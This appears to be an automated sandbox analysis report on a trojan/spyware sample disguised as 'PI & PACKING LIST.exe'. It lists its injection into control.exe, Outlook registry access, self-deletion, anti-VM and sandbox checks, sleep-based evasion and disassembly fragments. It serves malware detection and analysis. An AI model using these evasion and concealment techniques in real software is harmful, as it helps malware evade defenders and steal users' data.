Source: PI & PACKING LIST.exe, 00000002.00000003.261884863.0000000001191000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe Binary or memory string: OriginalFilenamesZHy.exe: vs PI & PACKING LIST.exe
Source: PI & PACKING LIST.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PI & PACKING LIST.exe ReversingLabs: Detection: 76%
Source: PI & PACKING LIST.exe Virustotal: Detection: 57%
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process created: C:\Users\user\Desktop\PI & PACKING LIST.exe C:\Users\user\Desktop\PI & PACKING LIST.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PI & PACKING LIST.exe.log
Source: C:\Windows\SysWOW64\control.exe File created: C:\Users\user\AppData\Local\Temp\71M40-2OQ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/2@6/5
Source: PI & PACKING LIST.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PI & PACKING LIST.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: PI & PACKING LIST.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: PI & PACKING LIST.exe, PI & PACKING LIST.exe, 00000002.00000002.354114112.0000000001210000.00000040.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.260987211.0000000001072000.00000004.00000800.00020000.00000000.sdmp, PI & PACKING LIST.exe, 00000002.00000003.259137326.0000000000EDE000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.514714921.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.353323429.0000000004B74000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.515759584.0000000004FCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.355819858.0000000004D15000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: PI & PACKING LIST.exe, Othello/MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.PI & PACKING LIST.exe.d0000.0.unpack, Othello/MainForm.cs .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E4539 push esi; ret 0_2_083E453A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E71E0 push eax; ret 0_2_083E73DA
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 0_2_083E3206 push ebx; iretd 0_2_083E3207
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0128D0D1 push ecx; ret 2_2_0128D0E4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0040A0C9 push 7C55F36Ch; retf 2_2_0040A0D3
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004210CC push eax; ret 2_2_0042111F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041A0DE pushfd ; iretd 2_2_0041A0EF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0041B08A push CBA396CFh; ret 2_2_0041B093
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00421119 push eax; ret 2_2_0042111F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00421122 push eax; ret 2_2_00421189
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00421183 push eax; ret 2_2_00421189
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0040A1B8 push 0845B845h; iretd 2_2_0040A1BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_004054C4 push edx; ret 2_2_004054C7
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_00419E80 push ebx; retf 2_2_00419E81
Source: initial sample Static PE information: section name: .text entropy: 7.603845618377083

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\control.exe File deleted: c:\users\user\desktop\pi & packing list.exe
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PI & PACKING LIST.exe PID: 6140, type: MEMORYSTR
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 5128 Thread sleep time: -42186s >= -30000s
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe TID: 6124 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01305BA5 rdtsc 2_2_01305BA5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe API coverage: 6.1 %
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Thread delayed: delay time: 42186
Source: control.exe, 0000000D.00000002.510454015.00000000010D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000003.00000000.281178206.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000003.00000000.288461486.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000003.00000000.267722463.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000003.00000000.287642705.0000000008FE9000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: PI & PACKING LIST.exe, 00000000.00000002.264428315.00000000029D0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov eax, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01254120 mov ecx, dword ptr fs:[00000030h] 2_2_01254120
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126513A mov eax, dword ptr fs:[00000030h] 2_2_0126513A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239100 mov eax, dword ptr fs:[00000030h] 2_2_01239100
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123C962 mov eax, dword ptr fs:[00000030h] 2_2_0123C962
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B171 mov eax, dword ptr fs:[00000030h] 2_2_0123B171
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B944 mov eax, dword ptr fs:[00000030h] 2_2_0125B944
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012661A0 mov eax, dword ptr fs:[00000030h] 2_2_012661A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F49A4 mov eax, dword ptr fs:[00000030h] 2_2_012F49A4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B69A6 mov eax, dword ptr fs:[00000030h] 2_2_012B69A6
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B51BE mov eax, dword ptr fs:[00000030h] 2_2_012B51BE
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov ecx, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012599BF mov eax, dword ptr fs:[00000030h] 2_2_012599BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126A185 mov eax, dword ptr fs:[00000030h] 2_2_0126A185
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125C182 mov eax, dword ptr fs:[00000030h] 2_2_0125C182
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262990 mov eax, dword ptr fs:[00000030h] 2_2_01262990
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0123B1E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0123B1E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123B1E1 mov eax, dword ptr fs:[00000030h] 2_2_0123B1E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012C41E8 mov eax, dword ptr fs:[00000030h] 2_2_012C41E8
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126002D mov eax, dword ptr fs:[00000030h] 2_2_0126002D
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0124B02A mov eax, dword ptr fs:[00000030h] 2_2_0124B02A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A830 mov eax, dword ptr fs:[00000030h] 2_2_0125A830
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01304015 mov eax, dword ptr fs:[00000030h] 2_2_01304015
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01304015 mov eax, dword ptr fs:[00000030h] 2_2_01304015
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h] 2_2_012B7016
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h] 2_2_012B7016
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B7016 mov eax, dword ptr fs:[00000030h] 2_2_012B7016
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01301074 mov eax, dword ptr fs:[00000030h] 2_2_01301074
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F2073 mov eax, dword ptr fs:[00000030h] 2_2_012F2073
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01250050 mov eax, dword ptr fs:[00000030h] 2_2_01250050
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01250050 mov eax, dword ptr fs:[00000030h] 2_2_01250050
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012620A0 mov eax, dword ptr fs:[00000030h] 2_2_012620A0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012790AF mov eax, dword ptr fs:[00000030h] 2_2_012790AF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F0BF mov ecx, dword ptr fs:[00000030h] 2_2_0126F0BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h] 2_2_0126F0BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126F0BF mov eax, dword ptr fs:[00000030h] 2_2_0126F0BF
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01239080 mov eax, dword ptr fs:[00000030h] 2_2_01239080
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h] 2_2_012B3884
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012B3884 mov eax, dword ptr fs:[00000030h] 2_2_012B3884
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0125B8E4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125B8E4 mov eax, dword ptr fs:[00000030h] 2_2_0125B8E4
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h] 2_2_012340E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h] 2_2_012340E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012340E1 mov eax, dword ptr fs:[00000030h] 2_2_012340E1
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012358EC mov eax, dword ptr fs:[00000030h] 2_2_012358EC
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov ecx, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012CB8D0 mov eax, dword ptr fs:[00000030h] 2_2_012CB8D0
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125A309 mov eax, dword ptr fs:[00000030h] 2_2_0125A309
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F131B mov eax, dword ptr fs:[00000030h] 2_2_012F131B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123DB60 mov ecx, dword ptr fs:[00000030h] 2_2_0123DB60
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h] 2_2_01263B7A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01263B7A mov eax, dword ptr fs:[00000030h] 2_2_01263B7A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123DB40 mov eax, dword ptr fs:[00000030h] 2_2_0123DB40
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01308B58 mov eax, dword ptr fs:[00000030h] 2_2_01308B58
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0123F358 mov eax, dword ptr fs:[00000030h] 2_2_0123F358
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h] 2_2_01264BAD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h] 2_2_01264BAD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01264BAD mov eax, dword ptr fs:[00000030h] 2_2_01264BAD
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01305BA5 mov eax, dword ptr fs:[00000030h] 2_2_01305BA5
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012F138A mov eax, dword ptr fs:[00000030h] 2_2_012F138A
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h] 2_2_01241B8F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01241B8F mov eax, dword ptr fs:[00000030h] 2_2_01241B8F
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h] 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h] 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126138B mov eax, dword ptr fs:[00000030h] 2_2_0126138B
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012ED380 mov ecx, dword ptr fs:[00000030h] 2_2_012ED380
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_01262397 mov eax, dword ptr fs:[00000030h] 2_2_01262397
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0126B390 mov eax, dword ptr fs:[00000030h] 2_2_0126B390
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_012603E2 mov eax, dword ptr fs:[00000030h] 2_2_012603E2
Source: C:\Users\user\Desktop\PI & PACKING LIST.exe Code function: 2_2_0125DBE9 mov eax, dword ptr fs:[00000030h] 2_2_0125DBE9
